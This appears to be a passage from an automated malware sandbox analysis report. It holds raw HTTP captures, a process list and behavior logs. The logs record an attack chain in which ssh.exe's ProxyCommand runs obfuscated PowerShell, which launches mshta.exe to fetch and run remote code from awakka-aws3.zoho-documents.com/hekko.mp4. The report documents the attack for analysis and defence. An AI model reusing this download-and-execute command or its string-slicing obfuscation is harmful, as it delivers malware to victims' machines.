                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                Host: awakka-aws3.zoho-documents.com
                                Connection: Keep-Alive
                                2024-12-31 14:41:47 UTC259INHTTP/1.1 403 Forbidden
                                Date: Tue, 31 Dec 2024 14:41:47 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                X-Frame-Options: SAMEORIGIN
                                Server: cloudflare
                                CF-RAY: 8fab084decec41f2-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-12-31 14:41:47 UTC1110INData Raw: 31 31 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                Data Ascii: 11ca<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                2024-12-31 14:41:47 UTC1369INData Raw: 6c 61 79 20 3d 20 27 62 6c 6f 63 6b 27 3b 0a 20 20 20 20 7d 29 0a 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74
                                Data Ascii: lay = 'block'; }) }</script>...<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-det
                                2024-12-31 14:41:47 UTC1369INData Raw: 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 42 61 4f 65 41 73 4c 47 33 65 75 35 4b 41 6f 59 75 42 53 4c 58 6e 4c 30 74 47 58 61 61 51 67 76 55 73 6d 50 62 35 76 51 65 76 6b 2d 31 37 33 35 36 35 36 31 30 37 2d 30 2e 30 2e 31 2e 31 2d 2f 68 65 6b 6b 6f 2e 6d 70 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63
                                Data Ascii: ype="text/plain"> <input type="hidden" name="atok" value="BaOeAsLG3eu5KAoYuBSLXnL0tGXaaQgvUsmPb5vQevk-1735656107-0.0.1.1-/hekko.mp4"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; bac
                                2024-12-31 14:41:47 UTC714INData Raw: 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 0a 20 20 3c 2f 70 3e 0a 20 20 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 64 28 29 7b 76 61 72 20 62 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65
                                Data Ascii: ="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span> </p> <script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-re
                                2024-12-31 14:41:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.549726172.67.129.824436464C:\Windows\System32\mshta.exe
                                TimestampBytes transferredDirectionData
                                2024-12-31 14:41:47 UTC421OUTGET /cdn-cgi/styles/cf.errors.css HTTP/1.1
                                Accept: */*
                                Referer: https://awakka-aws3.zoho-documents.com/hekko.mp4
                                Accept-Language: en-CH
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                Host: awakka-aws3.zoho-documents.com
                                Connection: Keep-Alive
                                2024-12-31 14:41:47 UTC411INHTTP/1.1 200 OK
                                Date: Tue, 31 Dec 2024 14:41:47 GMT
                                Content-Type: text/css
                                Content-Length: 24051
                                Connection: close
                                Last-Modified: Mon, 16 Dec 2024 06:11:56 GMT
                                ETag: "675fc4ac-5df3"
                                Server: cloudflare
                                CF-RAY: 8fab0851fdf90dc7-EWR
                                X-Frame-Options: DENY
                                X-Content-Type-Options: nosniff
                                Expires: Tue, 31 Dec 2024 16:41:47 GMT
                                Cache-Control: max-age=7200
                                Cache-Control: public
                                Accept-Ranges: bytes
                                2024-12-31 14:41:47 UTC958INData Raw: 23 63 66 2d 77 72 61 70 70 65 72 20 61 2c 23 63 66 2d 77 72 61 70 70 65 72 20 61 62 62 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 61 72 74 69 63 6c 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 61 73 69 64 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 69 67 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 6c 6f 63 6b 71 75 6f 74 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 6f 64 79 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 61 6e 76 61 73 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 61 70 74 69 6f 6e 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 65 6e 74 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 69 74 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 6f 64 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 64 64 2c 23 63 66 2d 77 72 61 70 70
                                Data Ascii: #cf-wrapper a,#cf-wrapper abbr,#cf-wrapper article,#cf-wrapper aside,#cf-wrapper b,#cf-wrapper big,#cf-wrapper blockquote,#cf-wrapper body,#cf-wrapper canvas,#cf-wrapper caption,#cf-wrapper center,#cf-wrapper cite,#cf-wrapper code,#cf-wrapper dd,#cf-wrapp
                                2024-12-31 14:41:47 UTC1369INData Raw: 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 74 72 6f 6e 67 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 75 62 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 75 6d 6d 61 72 79 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 75 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 61 62 6c 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 62 6f 64 79 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 66 6f 6f 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 68 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 68 65 61 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 75 2c 23 63 66 2d 77 72 61 70 70 65 72 20 75 6c 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f
                                Data Ascii: e,#cf-wrapper strong,#cf-wrapper sub,#cf-wrapper summary,#cf-wrapper sup,#cf-wrapper table,#cf-wrapper tbody,#cf-wrapper td,#cf-wrapper tfoot,#cf-wrapper th,#cf-wrapper thead,#cf-wrapper tr,#cf-wrapper tt,#cf-wrapper u,#cf-wrapper ul{margin:0;padding:0;bo
                                2024-12-31 14:41:47 UTC1369INData Raw: 31 2e 35 21 69 6d 70 6f 72 74 61 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 34 36 2c 31 33 39 2c 33 31 2c 2e 33 29 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 73 65 63 74 69 6f 6e 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 65 63 74 69 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 30 20 30 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 65 6d 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 65 6d
                                Data Ascii: 1.5!important;text-decoration:none!important;letter-spacing:normal;-webkit-tap-highlight-color:rgba(246,139,31,.3);-webkit-font-smoothing:antialiased}#cf-wrapper .cf-section,#cf-wrapper section{background:0 0;display:block;margin-bottom:2em;margin-top:2em
                                2024-12-31 14:41:47 UTC1369INData Raw: 6c 64 28 32 6e 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 34 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 66 6f 75 72 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 74 77 6f 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 32 2e 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 32 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69
                                Data Ascii: ld(2n),#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(2n),#cf-wrapper .cf-columns.four>.cf-column:nth-child(2n),#cf-wrapper .cf-columns.two>.cf-column:nth-child(2n){padding-left:22.5px;padding-right:0}#cf-wrapper .cf-columns.cols-2>.cf-column:nth-chi
                                2024-12-31 14:41:47 UTC1369INData Raw: 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 66 6f 75 72 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 6f 64 64 29 7b 63 6c 65 61 72 3a 6e 6f 6e 65 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 34 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 66 69 72 73 74 2d 63 68 69 6c 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 34 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 34 6e 2b 31 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 66 6f 75 72 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 66 69 72 73 74 2d 63 68 69 6c 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73
                                Data Ascii: ),#cf-wrapper .cf-columns.four>.cf-column:nth-child(odd){clear:none}#cf-wrapper .cf-columns.cols-4>.cf-column:first-child,#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(4n+1),#cf-wrapper .cf-columns.four>.cf-column:first-child,#cf-wrapper .cf-columns
                                2024-12-31 14:41:47 UTC1369INData Raw: 30 3b 70 61 64 64 69 6e 67 3a 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 31 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 34 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 36 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 74 72 6f 6e 67 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 33 7d 23 63 66 2d 77 72 61 70 70 65
                                Data Ascii: 0;padding:0}#cf-wrapper h1,#cf-wrapper h2,#cf-wrapper h3{font-weight:400}#cf-wrapper h4,#cf-wrapper h5,#cf-wrapper h6,#cf-wrapper strong{font-weight:600}#cf-wrapper h1{font-size:36px;line-height:1.2}#cf-wrapper h2{font-size:30px;line-height:1.3}#cf-wrappe
                                2024-12-31 14:41:47 UTC1369INData Raw: 68 32 2b 68 34 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 2b 68 35 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 2b 68 36 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 2b 68 35 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 2b 68 36 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 2b 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 34 2b 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2b 6f 6c 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2b 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2b 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2e 35 65 6d 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 39 39 39 3b 63 6f 6c
                                Data Ascii: h2+h4,#cf-wrapper h2+h5,#cf-wrapper h2+h6,#cf-wrapper h3+h5,#cf-wrapper h3+h6,#cf-wrapper h3+p,#cf-wrapper h4+p,#cf-wrapper h5+ol,#cf-wrapper h5+p,#cf-wrapper h5+ul{margin-top:.5em}#cf-wrapper .cf-btn{background-color:transparent;border:1px solid #999;col
                                2024-12-31 14:41:47 UTC1369INData Raw: 3a 23 36 32 61 31 64 38 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 31 36 33 39 35 39 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 65 72 72 6f 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 69 6d 70 6f 72 74 61 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 62 64 32 34 32 36 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 3a 68 6f 76 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 65 72 72 6f 72 3a 68 6f 76 65 72 2c 23
                                Data Ascii: :#62a1d8;border:1px solid #163959;color:#fff}#cf-wrapper .cf-btn-danger,#cf-wrapper .cf-btn-error,#cf-wrapper .cf-btn-important{background-color:#bd2426;border-color:transparent;color:#fff}#cf-wrapper .cf-btn-danger:hover,#cf-wrapper .cf-btn-error:hover,#
                                2024-12-31 14:41:47 UTC1369INData Raw: 61 63 65 3a 6e 6f 77 72 61 70 7d 23 63 66 2d 77 72 61 70 70 65 72 20 69 6e 70 75 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 65 6c 65 63 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 65 78 74 61 72 65 61 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 39 39 39 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 34 30 34 30 34 30 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 36 36 36 37 65 6d 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 34 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e
                                Data Ascii: ace:nowrap}#cf-wrapper input,#cf-wrapper select,#cf-wrapper textarea{background:#fff!important;border:1px solid #999!important;color:#404040!important;font-size:.86667em!important;line-height:1.24!important;margin:0 0 1em!important;max-width:100%!importan
                                2024-12-31 14:41:47 UTC1369INData Raw: 3a 23 34 30 34 30 34 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 3a 37 2e 35 70 78 20 31 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 61 6c 65 72 74 3a 65 6d 70 74 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 61 6c 65 72 74 20 2e 63 66 2d 63 6c 6f 73 65 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 2e 37 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 70 61 64 64 69 6e
                                Data Ascii: :#404040;font-size:13px;padding:7.5px 15px;position:relative;vertical-align:middle;border-radius:2px}#cf-wrapper .cf-alert:empty{display:none}#cf-wrapper .cf-alert .cf-close{border:1px solid transparent;color:inherit;font-size:18.75px;line-height:1;paddin


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.549727172.67.129.824436464C:\Windows\System32\mshta.exe
                                TimestampBytes transferredDirectionData
                                2024-12-31 14:41:48 UTC439OUTGET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1
                                Accept: */*
                                Referer: https://awakka-aws3.zoho-documents.com/hekko.mp4
                                Accept-Language: en-CH
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                Host: awakka-aws3.zoho-documents.com
                                Connection: Keep-Alive
                                2024-12-31 14:41:48 UTC409INHTTP/1.1 200 OK
                                Date: Tue, 31 Dec 2024 14:41:48 GMT
                                Content-Type: image/png
                                Content-Length: 452
                                Connection: close
                                Last-Modified: Fri, 06 Dec 2024 15:30:33 GMT
                                ETag: "67531899-1c4"
                                Server: cloudflare
                                CF-RAY: 8fab0856bd124400-EWR
                                X-Frame-Options: DENY
                                X-Content-Type-Options: nosniff
                                Expires: Tue, 31 Dec 2024 16:41:48 GMT
                                Cache-Control: max-age=7200
                                Cache-Control: public
                                Accept-Ranges: bytes
                                2024-12-31 14:41:48 UTC452INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 36 00 00 00 36 08 03 00 00 00 bb 9b 9a ef 00 00 00 33 50 4c 54 45 c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f ab b2 22 ed 00 00 00 11 74 52 4e 53 00 40 30 10 60 8f bf ff ef 7f af 9f df 20 50 cf 70 60 82 c8 9b 00 00 01 2f 49 44 41 54 78 01 bd d3 05 d2 b4 30 10 06 e1 8e 6c de c1 36 dc ff b2 9f 2b 95 c9 12 7e 79 4a 91 46 22 b8 c2 8b c8 80 94 6f 45 1f ac 4c 81 33 f2 ac 03 5b 1e 95 69 32 b5 94 6e 98 57 79 4a c4 91 8a 7a 26 9a 82 a9 af a4 46 95 f5 d0 1a fb 95 c7 62 bf b2 f2 e9 70 7e e3 a7 a0 df ee 7c 3a 74 35 f1 6d b3 b3 99 66 70 af 69 f2 2f 65 ef c7 fa 99 25 de 25 1b c9 b4 f0 6e d2 50 a6 ed fb 65
                                Data Ascii: PNGIHDR663PLTEE?E?E?E?E?E?E?E?E?E?E?E?E?E?E?E?E?"tRNS@0` Pp`/IDATx0l6+~yJF"oEL3[i2nWyJz&Fbp~|:t5mfpi/e%%nPe


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:09:41:41
                                Start date:31/12/2024
                                Path:C:\Windows\System32\OpenSSH\ssh.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)" .
                                Imagebase:0x7ff7a88e0000
                                File size:946'176 bytes
                                MD5 hash:C05426E6F6DFB30FB78FBA874A2FF7DC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:false

                                General

                                Target ID:1
                                Start time:09:41:41
                                Start date:31/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:3
                                Start time:09:41:42
                                Start date:31/12/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)
                                Imagebase:0x7ff7be880000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:4
                                Start time:09:41:44
                                Start date:31/12/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://awakka-aws3.zoho-documents.com/hekko.mp4"
                                Imagebase:0x7ff7be880000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:5
                                Start time:09:41:44
                                Start date:31/12/2024
                                Path:C:\Windows\System32\mshta.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\system32\mshta.exe" https://awakka-aws3.zoho-documents.com/hekko.mp4
                                Imagebase:0x7ff7c5190000
                                File size:14'848 bytes
                                MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:false

                                General

                                Target ID:6
                                Start time:09:41:46
                                Start date:31/12/2024
                                Path:C:\Windows\System32\svchost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                Imagebase:0x7ff7e52b0000
                                File size:55'320 bytes
                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Disassembly

                                Reset < >

                                  Executed Functions

                                  Function 00007FF8486533B5 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
